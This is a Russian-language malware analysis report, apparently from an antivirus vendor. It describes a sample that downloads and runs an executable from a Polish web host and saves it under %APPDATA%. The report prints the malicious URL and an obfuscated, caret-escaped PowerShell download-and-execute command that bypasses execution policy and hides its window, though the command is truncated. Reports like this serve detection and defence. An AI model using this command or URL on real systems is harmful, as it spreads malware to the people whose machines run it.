Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://sklep.ppawlus.cba.pl/bonpaac/templates/4funrjxb/pzchyeaq.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "PowER^sHeLL^.exe^ ^-E^x^eCUTIOnpOlI^c^y B^YPa^s^S^ ^-^n^OP^R^of^Il^E^ -^W^IN^d^owST^yLe^ ^HIdD^eN ^(N^Ew-^Ob^j^e^c^t sysTE^m.^NEt.WEB^cLIE^NT)^.DoWNLoad^f^I^LE('http://sklep....
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'sk###.#pawlus.cba.pl':80
TCP
Запросы HTTP GET
- http://sk###.#pawlus.cba.pl/bonpaac/templates/4fUNrJXb/pzcHYeAq.exe
UDP
- DNS ASK sk###.#pawlus.cba.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "PowER^sHeLL^.exe^ ^-E^x^eCUTIOnpOlI^c^y B^YPa^s^S^ ^-^n^OP^R^of^Il^E^ -^W^IN^d^owST^yLe^ ^HIdD^eN ^(N^Ew-^Ob^j^e^c^t sysTE^m.^NEt.WEB^cLIE^NT)^.DoWNLoad^f^I^LE('http://sklep....' (со скрытым окном)
